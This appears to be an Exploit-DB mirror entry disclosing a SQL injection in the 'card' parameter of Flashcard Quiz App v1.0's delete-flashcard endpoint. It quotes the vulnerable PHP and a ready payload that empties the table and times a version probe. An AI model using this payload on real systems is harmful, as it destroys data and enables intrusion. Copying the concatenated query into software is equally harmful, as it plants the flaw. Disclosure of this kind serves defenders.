bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/remote/51812.txt
Exploit-DB 9734fcef1e DB: 2024-02-27 
12 changes to exploits/shellcodes/ghdb

Wyrestorm Apollo VX20  < 1.3.58 - Incorrect Access Control 'DoS'
Wyrestorm Apollo VX20 < 1.3.58 - Account Enumeration
Wyrestorm Apollo VX20 < 1.3.58 - Incorrect Access Control 'Credentials Disclosure'
FAQ Management System v1.0 - 'faq' SQL Injection
Flashcard Quiz App v1.0 - 'card' SQL Injection

Simple Inventory Management System v1.0 - 'email' SQL Injection

comments-like-dislike < 1.2.0 - Authenticated (Subscriber+) Plugin Setting Reset

Online Shopping System Advanced - Sql Injection

taskhub 2.8.7 - SQL Injection

IBM i Access Client Solutions v1.1.2 - 1.1.4_ v1.1.4.3 - 1.1.9.4 - Remote Credential Theft
2024-02-27 00:16:33 +00:00

46 lines
No EOL
1.4 KiB
Text
Raw Blame History

# Exploit Title: Flashcard Quiz App v1.0 - 'card' SQL Injection
# Google Dork: N/A
# Application: Flashcard Quiz App
# Date: 25.02.2024
# Bugs: SQL Injection
# Exploit Author: SoSPiro
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/17160/flashcard-quiz-app-using-php-and-mysql-source-code.html
# Version: 1.0
# Tested on: Windows 10 64 bit Wampserver
# CVE : N/A
## Vulnerability Description:
The provided PHP code is vulnerable to SQL injection. SQL injection occurs when user inputs are directly concatenated into SQL queries without proper sanitization, allowing an attacker to manipulate the SQL query and potentially perform unauthorized actions on the database.
## Proof of Concept (PoC):
This vulnerability involves injecting malicious SQL code into the 'card' parameter in the URL.
1. Original Code:
$card = $_GET['card'];
$query = "DELETE FROM tbl_card WHERE tbl_card_id = '$card'";
2. Payload:
' OR '1'='1'; SELECT IF(VERSION() LIKE '8.0.31%', SLEEP(5), 0); --
3. Injected Query:
DELETE FROM tbl_card WHERE tbl_card_id = '' OR '1'='1'; SELECT IF(VERSION() LIKE '8.0.31%', SLEEP(5), 0); --
Request Response foto: https://i.imgur.com/5IXvpiZ.png
## Vulnerable code section:
====================================================
endpoint/delete-flashcard.php
$card = $_GET['card'];
$query = "DELETE FROM tbl_card WHERE tbl_card_id = '$card'";
Reference in a new issue View git blame Copy permalink